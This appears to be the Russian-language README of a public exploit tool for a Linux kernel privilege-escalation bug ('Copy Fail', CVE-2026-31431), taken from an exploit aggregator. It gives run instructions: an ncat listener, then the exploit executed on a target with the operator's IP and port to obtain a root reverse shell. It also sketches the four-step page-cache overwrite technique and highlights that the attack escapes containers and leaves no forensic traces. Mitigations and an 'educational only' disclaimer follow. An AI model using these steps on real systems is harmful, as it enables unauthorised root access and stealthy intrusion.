## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-M4XSEC-CVE-2026-31431-RCE-EXPLOIT
# 🔴 CVE-2026-31431 — «Copy Fail»
### 9-летняя логическая ошибка в ядре Linux, дающая root за секунды
   
* * *
## Обзор
**Copy Fail** — это уязвимость локального повышения привилегий (LPE) высокой степени серьёзности в криптографической подсистеме ядра Linux (`algif_aead`). Обнаруженная и раскрытая компанией **Theori** (с помощью их инструмента анализа уязвимостей на базе ИИ **Xint Code**) **29 апреля 2026 года** , эта ошибка позволяет любому непривилегированному локальному пользователю записать 4 контролируемых байта в page cache любого читаемого файла — и использовать это для получения **root** практически на всех основных дистрибутивах Linux, выпущенных с 2017 года.
Рабочий proof-of-concept эксплойт занимает всего **~732 байта Python**.
* * *
## Эксплуатация
1. Запустите Ncat Listener
root@kitploit:~
sudo ncat -lvnp PORT
2. Выполните эксплойт на целевой машине
root@kitploit:~
# Использование Python-скрипта
python3 CVE-2026-31431-Exploit.py IP PORT
# Скомпилированный бинарник
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT
* * *
## 🧬 Техническая сводка
### Как работает эксплойт (4 шага)
1. **Откройте** сокет `AF_ALG` и привяжитесь к `authencesn(hmac(sha256),cbc(aes))`
2. **Сделайте splice** страниц читаемого setuid-бинарника в сокет
3. Черновая запись AEAD в ядре перезаписывает **4 байта** в page cache этого бинарника
4. **Выполните** теперь повреждённый setuid-бинарник → **root shell**
### Почему это опасно
* **Нет окна гонки** — детерминированно, срабатывает каждый раз
* **Не требуется обход смещения ядра / KASLR**
* **Один и тот же эксплойт работает во всех дистрибутивах** — Ubuntu, RHEL, Amazon Linux, SUSE, Rocky и др.
* **Побег из контейнера** — page cache является общим; запись изнутри контейнера затрагивает хост
* **Без изменения диска** — мониторы целостности файлов (AIDE, OSSEC и др.) не обнаружат это
* **Нет криминалистических следов на диске**
* * *
## 🎯 Затронутые версии
### Подтверждённые уязвимые дистрибутивы
* Ubuntu 24.04 LTS
* Amazon Linux 2023
* RHEL 10.1
* SUSE 16
* Rocky Linux 9.7
> По сути, **каждый крупный дистрибутив Linux, выпущенный с 2017 года** , затронут.
* * *
## 🛡️ Смягчение последствий
### 1\. Патч (рекомендуется)
Обновите ядро до версии, содержащей исправляющий коммит `fafe0fa2995a`. Большинство крупных дистрибутивов выпустили или выпускают обновлённые пакеты ядра.
### 2\. Временные обходные меры
Если вы не можете применить патч немедленно:
* **Заблокируйте создание сокетов AF_ALG** с помощью политики seccomp
* **Внесите модуль`algif_aead` в чёрный список:**
root@kitploit:~
echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo modprobe -r algif_aead 2>/dev/null
## ⚠️ Отказ от ответственности
Этот репозиторий предназначен **только для образовательных и защитных целей**. Информация здесь призвана помочь командам безопасности понять, обнаружить и смягчить CVE-2026-31431. Всегда соблюдайте практики ответственного раскрытия и действующее законодательство.
* * *
### ⭐ Поставьте звёзду этому репозиторию, чтобы быть в курсе патчей и рекомендаций по обнаружению.